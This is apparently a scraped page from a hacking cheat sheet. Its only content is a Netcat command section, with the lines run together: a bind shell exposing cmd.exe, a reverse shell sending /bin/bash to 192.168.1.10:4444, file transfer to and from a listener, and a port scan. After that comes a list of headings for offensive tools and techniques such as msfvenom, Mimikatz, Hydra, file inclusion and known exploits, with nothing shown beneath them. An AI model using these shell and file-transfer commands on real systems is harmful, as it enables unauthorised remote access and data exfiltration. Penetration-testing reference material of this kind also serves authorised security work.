Hacking cheatsheet
Hacking command list
Netcat
nc -nv 192.168.1.10 110nc -nlvp 4444
nc -nv 192.168.1.10 4444nc -nlvp 4444 > dest-file
nc -nv 192.168.1.10 4444 < local-filenc -nlvp 4444 -e cmd.exe
nc -nv 192.168.1.10 4444nc -nlvp 4444
nc -nv 192.168.1.10 4444 -e /bin/bashnc -nvv -w 1 -z 192.168.1.10 3388-3390Ncat
Tcpdump
The harvester
host
dnsrecon
dnsenum
Nmap
SMB
SMTP
SNMP
msfvenom
GCC / compilation
Nikto
dirb
FTP
Mimikatz
Webserver
NoSQLmap
NoSQl user/pass enum
Searchsploit
John the ripper
hashcat
File inclusion
Shells
Mysql
Robots.txt
Hydra
Fuzzing
ffuz
Whatweb
Windows commands
Downloads
Windows exploit suggester
Well know exploits
Common vulnerabilities
vsFTPD 2.3.4
Windows XP SP1 priv escalation
Last updated